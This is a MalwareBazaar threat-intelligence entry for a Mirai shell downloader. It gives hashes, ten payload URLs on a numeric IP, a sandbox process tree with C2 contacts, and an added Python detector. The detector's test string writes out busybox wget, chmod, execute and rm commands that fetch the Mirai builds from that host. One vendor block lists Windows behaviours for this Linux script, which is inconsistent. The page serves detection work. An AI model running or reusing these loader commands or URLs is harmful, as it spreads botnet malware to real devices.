MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 8

SHA256 hash: 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110
SHA3-384 hash: 4eb4b906504d576fb7fdaafac8373ab5c4066090e29ac3bf82bf2b15e4870203015bd6d6b2caa7290397f456628a4d02
SHA1 hash: c7ca388012b558f8f1a23517233ca071b1e6903c
MD5 hash: dc5a54f97befbcab9be127add089cf51
humanhash: lake-sink-football-fruit
File name: w
Signature: Mirai
File size: 1'102 bytes
First seen: 2025-12-25 07:40:25 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:efIdXIGDNIiIptKKIIo43lIrfIwv7jIv4s7gIsR0WJI0Kn4747In0:efIdXIG9IptRI8lIrfIwv7jIv4HIE0Wi
TLSH: T14311F5FE9FA2613541D40A792A664439D80DADF43944CEECB48B0ABB7F84A14FD19B4C
Magika: batch
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://192.227.152.84/sdxkzX_UXA229x.arm | 04ef8f7a8392a9d6521b94be31a8057f5ecc97760ef93fa11c5825a9309bb358 | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm5 | bf1dc3f056c16552095ff55778cd47895488d9fe00c37d6784f7aa552991357a | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm6 | 5e1843ee80b0a0f47fe7c102882aecaf626b2c2c671f80f217b8fb5558cf4456 | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm7 | f52ee4641fa9d67794922873d98e481346201ac5794340ce9082194bc373550a | Mirai | arm elf geofenced mirai ua-wget USA
http://192.227.152.84/sdxkzX_UXA229x.m68k | 176a51cc028c9a13f6776072813213c3580bcb758c15faf45b1e443ccf5bc9ea | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.mips | 070ab9396a2fa20b47cfb1741a65ae67f063cae74abfd0bfaff664aa102b7945 | Mirai | elf geofenced mips mirai ua-wget USA
http://192.227.152.84/sdxkzX_UXA229x.ppc | 1b1df35f15ce9734c51a5ee94460400efafd1523b4b3baea89ddb0cf86c970dc | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.sh4 | c2c21ee47f5f90c68b992bedae3b57314257e435ebbd61febb09d35547b3ee99 | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.spc | 9b7970310c46c61a2aa1ff5dd3f16bdb742afdc7a3fc5e735d12b8a59223c767 | Mirai | elf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.x86 | 5c3039368622c77ba28152085caf3d39531ae217eeb63a22d69c7e48715b2a2c | Mirai | elf mirai ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 42
Origin country: DE

Vendor Threat Intelligence
No detections
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox mirai

Verdict: Malicious
File Type: text
First seen: 2025-12-25T04:48:00Z UTC
Last seen: 2025-12-25T04:54:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.cl
Status: terminated
Behavior Graph (process tree and network contacts recovered from the sandbox graph):
/usr/bin/sudo (pid 3275)
  execve -> /tmp/sample.bin (pid 3281)
    ten rounds, one per architecture, of:
      execve -> /usr/bin/busybox (net, send-data, write-file); pids 3282, 3337, 3392, 3456, 3506, 3547, 3641, 3688, 3748, 3814
      execve -> /usr/bin/chmod; pids 3333, 3386, 3451, 3503, 3541, 3635, 3683, 3741, 3807, 3887
      clone  -> /usr/bin/dash; pids 3335, 3388, 3453, 3504, 3543, 3637, 3685, 3743, 3809 (nine clones)
    execve -> /home/sandbox/sdxkzX_UXA229x.x86 (pid 3888, delete-file)
      clone -> /home/sandbox/sdxkzX_UXA229x.x86 (pid 3889, net, send-data, zombie)
        clone -> /home/sandbox/sdxkzX_UXA229x.x86 (pid 3890)
    execve -> /usr/bin/rm (pid 3891, delete-file)
Network contacts:
  192.227.152.84:80   from each of the ten busybox processes; 95 or 96 bytes sent per connection (the one-byte difference tracks three- versus four-character architecture suffixes in the requested file names, see the IOC table above)
  146.103.41.220:6669 from pid 3889 (sdxkzX_UXA229x.x86); 6 bytes sent
  8.8.8.8:53          from pid 3889; connection
Of the ten downloaded payloads only the x86 build ran in this sandbox; the chmod and dash steps for the other architectures complete without a matching execution node.

Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Linux.Downloader.Generic
Status: Suspicious
First seen: 2025-12-24 13:49:43 UTC
File Type: Text (Shell)
AV detection: 15 of 24 (62.50%)
Threat level: 3/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
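The rule description above and the sandbox behaviour graph describe the same four-stage loader technique: fetch a binary from a numeric IP, chmod it, execute it, remove it, repeated once per architecture. The following Python is an added example, not code from MalwareBazaar, the rule author, or the sample itself; it implements that technique-based check over shell-script text and extracts the download URLs and architecture set as IOCs. The sample's own 1'102 bytes are not reproduced on this page, so the loader text it scans is constructed: the IP 192.227.152.84, the file stem sdxkzX_UXA229x and the ten suffixes come from the IOC table, while the one-line-per-architecture command layout is an assumption. The benign installer used as the negative case is also constructed.

```python
import re
from dataclasses import dataclass, field

# Architecture suffixes listed in the IOC table on this page.
ARCH_SUFFIXES = ["arm", "arm5", "arm6", "arm7", "m68k", "mips", "ppc", "sh4", "spc", "x86"]

# Constructed stand-in for the loader (assumption: the real script's layout is
# not on the page). Mirrors the behaviour graph: busybox download from
# 192.227.152.84, chmod, execute, rm, once per architecture.
CONSTRUCTED_LOADER = "#!/bin/sh\n" + "".join(
    f"busybox wget http://192.227.152.84/sdxkzX_UXA229x.{a}; "
    f"chmod 777 sdxkzX_UXA229x.{a}; ./sdxkzX_UXA229x.{a}; rm -f sdxkzX_UXA229x.{a}\n"
    for a in ARCH_SUFFIXES
)

# Constructed negative case: downloads and chmods, but from a hostname over
# HTTPS and without the per-architecture execute/delete loop.
CONSTRUCTED_BENIGN = """#!/bin/sh
set -e
curl -fsSL https://example.org/tool.tar.gz -o /tmp/tool.tar.gz
tar -xzf /tmp/tool.tar.gz -C /usr/local/bin
chmod +x /usr/local/bin/tool
"""

# Stage patterns. The URL must use a dotted-quad host; path stops at shell
# separators so "http://ip/file;" yields "file", not "file;".
NUMERIC_IP_URL = re.compile(r"(https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([^\s;&|'\"]+))")
DOWNLOADER = re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")
CHMOD = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
EXEC_LOCAL = re.compile(r"(?:^|[;&|\s])\./([^\s;&|]+)", re.MULTILINE)
CLEANUP = re.compile(r"\brm\s+(?:-\w+\s+)*([^\s;&|]+)")
# Architecture suffix at the end of the downloaded file name.
ARCH = re.compile(r"\.(arm\d?|m68k|mips(?:el)?|ppc|sh4|spc|sparc|x86(?:_64)?|i[3-6]86)$")


@dataclass
class ScanResult:
    hosts: set = field(default_factory=set)    # numeric-IP hosts contacted
    urls: list = field(default_factory=list)   # full download URLs, in script order
    archs: set = field(default_factory=set)    # architecture suffixes seen
    downloads: int = 0
    chmods: int = 0
    execs: int = 0
    removes: int = 0

    @property
    def is_loader(self) -> bool:
        # The technique, not any specific IP or file name: a numeric-IP
        # download, a chmod, a local execution, and payloads for at least
        # two architectures.
        return bool(self.hosts) and self.chmods > 0 and self.execs > 0 and len(self.archs) >= 2


def scan_script(text: str) -> ScanResult:
    """Score shell-script text for the multi-arch loader pattern and collect IOCs."""
    r = ScanResult()
    for url, host, path in NUMERIC_IP_URL.findall(text):
        r.hosts.add(host)
        r.urls.append(url)
        m = ARCH.search(path)
        if m:
            r.archs.add(m.group(1))
    r.downloads = len(DOWNLOADER.findall(text))
    r.chmods = len(CHMOD.findall(text))
    r.execs = len(EXEC_LOCAL.findall(text))
    r.removes = len(CLEANUP.findall(text))
    return r


if __name__ == "__main__":
    for name, script in (("constructed loader", CONSTRUCTED_LOADER), ("constructed benign", CONSTRUCTED_BENIGN)):
        res = scan_script(script)
        print(f"{name}: loader={res.is_loader} hosts={sorted(res.hosts)} archs={sorted(res.archs)} "
              f"download/chmod/exec/rm={res.downloads}/{res.chmods}/{res.execs}/{res.removes}")
        for u in res.urls:
            print("  IOC", u)
```

The verdict deliberately ignores the IP and file stem, so a re-hosted copy of the same loader with a different stem still trips it; the `hosts` and `urls` fields are what you would feed into a blocklist, and `archs` tells you which ELF builds to expect in the follow-on traffic. Obfuscated loaders that assemble the URL at runtime are outside what this text-level check can see.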

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  Mirai
    sh 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110 (this sample)

Delivery method: Distributed via web download

Comments